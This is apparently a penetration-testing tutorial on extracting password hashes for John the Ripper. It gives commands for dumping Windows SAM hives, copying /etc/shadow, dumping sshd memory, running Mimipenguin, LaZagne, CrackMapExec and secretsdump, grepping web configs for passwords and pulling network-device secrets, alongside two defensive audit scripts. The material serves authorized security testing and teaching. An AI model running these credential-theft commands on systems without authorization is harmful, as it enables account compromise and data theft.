Exploitation: Extracting Password Hashes

Learn techniques for extracting password hashes from various systems for password cracking with John the Ripper

The exploitation phase in password cracking focuses on extracting password hashes from target systems. This is a critical step that bridges the gap between identifying vulnerabilities and actually cracking passwords. This guide covers techniques for extracting password hashes from various systems and preparing them for cracking with John the Ripper.

Windows Password Hash Extraction

Extracting from SAM Database

The Security Account Manager (SAM) database stores local user account information including password hashes.

Using reg.exe (requires Administrator privileges)

# Save the SAM and SYSTEM hives
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

Using secretsdump.py from Impacket

# Extract hashes from the saved files
secretsdump.py -sam sam.save -system system.save LOCAL

Using John the Ripper's built-in tools

# Convert the SAM and SYSTEM files to John format
pwdump sam.save system.save > hashes.txt

# Alternatively, use the built-in script
run/pwdump.py sam.save system.save > hashes.txt

The extracted hashes are in pwdump format, username:RID:LM hash:NT hash:::, which John the Ripper reads directly.
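Reading that pwdump format from the defender's side, as an added example that is not part of this guide or of John the Ripper: the parser below takes lines in username:RID:LM hash:NT hash::: form and flags the storage weaknesses an auditor reports (LM hashes still stored, blank passwords, one NT hash reused across accounts). The sample dump and its hash values are constructed.

```python
# Audit helper for pwdump-format lines (username:RID:LM hash:NT hash:::).
# Added example, not part of the original guide or of John the Ripper.
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)

def parse_pwdump(text):
    """Return a list of (user, rid, lm, nt) tuples; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            rows.append((user, int(rid), lm.lower(), nt.lower()))
    return rows

def audit_pwdump(text):
    """Flag weak storage states a defender should fix before anyone cracks them."""
    rows = parse_pwdump(text)
    by_nt = defaultdict(list)
    for user, _, _, nt in rows:
        by_nt[nt].append(user)
    return {
        # LM field populated: the password is still stored with the legacy LM scheme
        "lm_enabled": sorted(u for u, _, lm, _ in rows if lm != EMPTY_LM),
        # NT hash of the empty string: the account has a blank password
        "blank_password": sorted(u for u, _, _, nt in rows if nt == EMPTY_NT),
        # Same NT hash on several accounts: identical (reused) passwords
        "reused_password": sorted(users for nt, users in by_nt.items()
                                  if len(users) > 1 and nt != EMPTY_NT),
    }

# Constructed sample dump (made-up accounts and hash values, not real credentials)
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0011223344556677889900aabbccddee:0123456789abcdef0123456789abcdef:::
not a valid line
"""

if __name__ == "__main__":
    print(audit_pwdump(SAMPLE))
```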

Linux/Unix Password Hash Extraction

Shadow File Extraction

The /etc/shadow file contains user password hashes on Linux/Unix systems.

# Direct copy (requires root)
sudo cp /etc/shadow /tmp/shadow_copy

# Using cat (requires root)
sudo cat /etc/shadow > /tmp/shadow_copy

# Using John's unshadow tool
sudo unshadow /etc/passwd /etc/shadow > /tmp/passwords.txt

The unshadow tool combines information from both files into a format that John the Ripper can use directly.

Hash Format Conversion

Convert extracted hashes to formats compatible with John the Ripper:

# For shadow file
sudo unshadow /etc/passwd /etc/shadow > unshadowed.txt

# Keep only the user:hash pairs (drops the password-aging fields)
grep -v '^#' /etc/shadow | cut -d: -f1,2 > shadow_hashes.txt

# For a specific user (anchor on the username field so similar names do not match)
grep '^username:' /etc/shadow | cut -d: -f1,2 > user_hash.txt

John the Ripper can automatically detect most hash types from the shadow file format.

Extracting from Linux Memory

1. Dump process memory

Use memory forensics tools to extract credentials from memory:

# Using gcore to dump process memory
sudo gcore -o auth_dump $(pgrep sshd)

# Using GDB
sudo gdb -p $(pgrep pam) -ex "generate-core-file /tmp/pam_core" -ex "quit"

These commands create memory dumps of authentication-related processes.

2. Extract strings from memory dumps

Search for password hashes or plaintext credentials:

# Search for crypt-style hash prefixes such as $1$, $5$, $6$
# (a single backslash: in an extended regex '\$' is a literal dollar sign, '\\$' is a backslash at end of line)
strings auth_dump | grep -E '\$[1-9]\$'

# Search for common password patterns
strings auth_dump | grep -E 'password|passwd|pwd'

This may reveal credentials cached in memory.

3. Use specialized tools

Several tools can extract credentials from memory:

# Using Mimipenguin
sudo python3 mimipenguin.py

# Using LaZagne
sudo python3 laZagne.py all

These tools are designed to extract credentials from memory on Linux systems.

Database Password Hash Extraction

Web Application Password Hash Extraction

Extracting from Configuration Files

Web applications often store database credentials in configuration files:

PHP Applications

# Search for common config files
find /var/www/ -name "config.php" -o -name "wp-config.php" -o -name "settings.php"

# Extract database credentials
grep -E "password|passwd|pwd" /var/www/html/config.php

.NET Applications

# Search for web.config files
find /var/www/ -name "web.config"

# Extract connection strings
grep -A 3 "connectionString" /var/www/site/web.config

Java Applications

# Search for properties files
find /var/www/ -name "*.properties" -o -name "application.yml"

# Extract credentials
grep -E "password|passwd|pwd" /var/www/app/application.properties

Use these credentials to access the database and extract password hashes.

Network Device Password Hash Extraction

Cisco Devices

Extract password hashes from Cisco devices:

# Show running configuration
show running-config

# Look for lines like:
enable secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0
username admin privilege 15 secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0

Format for John the Ripper:

# For type 5 passwords (MD5); single quotes stop the shell from expanding $1, $mERr and $hx5... as variables
echo 'admin:$1$mERr$hx5rVt7rPNoS4wqbXKX7m0' > cisco_hashes.txt

# Use John with the md5crypt format
john --format=md5crypt cisco_hashes.txt

For type 8 (PBKDF2) and type 9 (scrypt) hashes, use the matching John format instead of md5crypt; john --list=formats prints the available format names.

Juniper Devices

Extract password hashes from Juniper devices:

# Show configuration
show configuration | display set | match encrypted-password

# Look for lines like:
set system root-authentication encrypted-password "$1$rhyKTjKM$EJl4xnwrP.KGK/0QY0wYv0"

Format for John the Ripper:

# For MD5 hashes; single quotes keep the shell from expanding the $-separated fields of the hash
echo 'root:$1$rhyKTjKM$EJl4xnwrP.KGK/0QY0wYv0' > juniper_hashes.txt

# Use John with the md5crypt format
john --format=md5crypt juniper_hashes.txt

For $5$ (SHA-256) and $6$ (SHA-512) hashes, use the matching sha256crypt or sha512crypt format instead of md5crypt.

Other Network Devices

1. Extract configuration

Access the device configuration through:

  • Console access
  • SSH/Telnet access
  • TFTP backup
  • SNMP configuration download

# Using SNMP to download config (if enabled)
snmpwalk -c community -v2c 192.168.1.1 .1.3.6.1.4.1.9.9.96.1.1.1.1.2

2. Identify hash formats

Different devices use different hash formats:

  • Cisco: Type 5 (MD5), Type 8 (PBKDF2), Type 9 (scrypt)
  • Juniper: $1$ (MD5), $5$ (SHA-256), $6$ (SHA-512)
  • Fortinet: Proprietary format
  • Mikrotik: MD5 or SHA-256

Identify the format based on the prefix or documentation.
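The prefix check in step 2 carried out in code, as an added example that is not part of this guide or of John the Ripper: it reads /etc/shadow entries as well as the Cisco secret and Junos encrypted-password lines shown above (plus the Junos "login user ... authentication" form, which is assumed here), classifies each hash by its $n$ prefix and reports the accounts still protected by md5crypt. Scheme labels are descriptive, not John --format names, and the weak/strong rating is this example's own.

```python
# Classify crypt-style hash prefixes from /etc/shadow, Cisco IOS "secret" and Junos
# "encrypted-password" lines and flag weak schemes (added example; labels are
# descriptive, not John --format names; the weak rating is this example's own).
import re
PREFIXES = {                         # prefix -> (scheme label, weak?)
    "$1$": ("md5crypt", True),       # Linux md5crypt, Cisco type 5, Juniper $1$
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$y$": ("yescrypt", False),      # default on current Debian/Fedora systems
    "$8$": ("cisco-type8-pbkdf2", False),
    "$9$": ("cisco-type9-scrypt", False),
}
CISCO_RE = re.compile(r"^(?:username\s+(\S+).*?|enable)\s+secret\s+\d+\s+(\$\d\$\S+)")
JUNOS_RE = re.compile(r'^set system (?:(root)-authentication|login user (\S+) authentication)'
                      r' encrypted-password "([^"]+)"')

def classify_hash(h):
    """Return (scheme, weak) for a crypt-style hash, or ("unknown", None)."""
    for prefix, info in PREFIXES.items():
        if h.startswith(prefix):
            return info
    return ("unknown", None)

def extract_hashes(text):
    """Yield (account, hash) pairs; locked or empty shadow fields (*, !) are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if m := CISCO_RE.match(line):
            yield (m.group(1) or "enable"), m.group(2)
        elif m := JUNOS_RE.match(line):
            yield (m.group(1) or m.group(2)), m.group(3)
        else:
            fields = line.split(":")          # shadow-style line: user:hash:...
            if len(fields) >= 2 and fields[1].startswith("$"):
                yield fields[0], fields[1]

def weak_accounts(text):
    """Accounts whose stored hash uses a weak or unrecognised scheme."""
    return sorted((u, classify_hash(h)[0]) for u, h in extract_hashes(text)
                  if classify_hash(h)[1] is not False)
# Constructed sample: made-up shadow lines plus the device lines quoted in this guide
SAMPLE = """\
root:$6$saltsalt$9Yz8Zt2Qm1LxH4:19000:0:99999:7:::
legacy:$1$saltsalt$abcdefghijklmnopqrstuv:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
enable secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0
username admin privilege 15 secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0
username ops secret 9 $9$constructedsalt$constructedhash
set system root-authentication encrypted-password "$1$rhyKTjKM$EJl4xnwrP.KGK/0QY0wYv0"
"""
```

Running weak_accounts(SAMPLE) lists admin, enable, legacy and root as md5crypt; the $6$ and $9$ entries and the locked daemon account are not reported.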

3. Format for John the Ripper

Prepare the hashes for cracking:

# General format (single quotes, because crypt-style hashes contain $ which the shell would otherwise expand)
echo 'username:hash' > network_hashes.txt

# Use appropriate format flag
john --format=md5crypt network_hashes.txt  # For Cisco Type 5
john --format=sha256crypt network_hashes.txt  # For SHA-256 hashes

Some proprietary formats may require custom rules or formats.

Preparing Hashes for John the Ripper

Converting Hashes to John Format

John the Ripper expects hashes in specific formats:

Windows Hashes

# Convert Windows hashes to John format
python3 john/run/pwdump2john.py windows_dump.txt > john_windows_hashes.txt

# For NTDS dumps
python3 john/run/secretsdump2john.py ntds_dump.txt > john_ntds_hashes.txt

Linux/Unix Hashes

# Combine passwd and shadow files
unshadow /etc/passwd /etc/shadow > john_linux_hashes.txt

Database Hashes

# Convert MySQL hashes
python3 john/run/mysql_to_john.py mysql_dump.txt > john_mysql_hashes.txt

# Convert Oracle hashes
python3 john/run/oracle2john.py oracle_dump.txt > john_oracle_hashes.txt

John includes many conversion scripts in the run/ directory.

Hash Extraction Tools

Built-in John the Ripper Tools

John the Ripper includes many extraction and conversion tools:

  • unshadow: Combines passwd and shadow files
  • zip2john: Extracts hashes from password-protected ZIP files
  • pdf2john: Extracts hashes from password-protected PDF files
  • office2john: Extracts hashes from MS Office documents
  • ssh2john: Extracts hashes from SSH private keys

# Example usage
./run/zip2john protected.zip > zip_hash.txt
./run/pdf2john document.pdf > pdf_hash.txt
./run/ssh2john id_rsa > ssh_hash.txt

These tools create output in formats ready for John the Ripper.

Third-Party Extraction Tools

Several third-party tools complement John the Ripper:

  • Mimikatz: Windows credential extraction
  • Hashcat Utils: Hash manipulation tools
  • CrackMapExec: Network credential harvesting
  • Impacket: Windows hash extraction tools
  • LaZagne: Credential recovery tool

# Example with CrackMapExec
crackmapexec smb 192.168.1.0/24 -u administrator -p password --sam

# Example with Impacket's secretsdump
secretsdump.py domain/user:password@192.168.1.100

These tools can extract hashes from various sources.

Documentation and Chain of Custody

1. Document authorization

Always maintain proper documentation:

  • Written authorization from system owner
  • Scope of the assessment
  • Specific systems authorized for testing
  • Time frame for testing activities

2. Maintain chain of custody

Protect extracted password data:

  • Store hashes in encrypted containers
  • Limit access to authorized personnel only
  • Delete data when no longer needed
  • Document all handling of password data

3. Report findings responsibly

Follow responsible disclosure practices:

  • Report vulnerabilities to system owners
  • Provide clear remediation guidance
  • Do not share credentials or hashes publicly
  • Follow the organization's security policies

Professional Tip:

Always verify that your hash extraction methods are working correctly by testing them in a controlled environment first. This ensures you'll be able to extract hashes efficiently during actual assessments and reduces the risk of errors that might impact system stability.

Next Steps

Now that you understand how to extract password hashes from various systems, you can:

  1. Learn about password cracking strategies using John the Ripper
  2. Explore optimization best practices to improve cracking efficiency
  3. Study tool integration to combine John with other security tools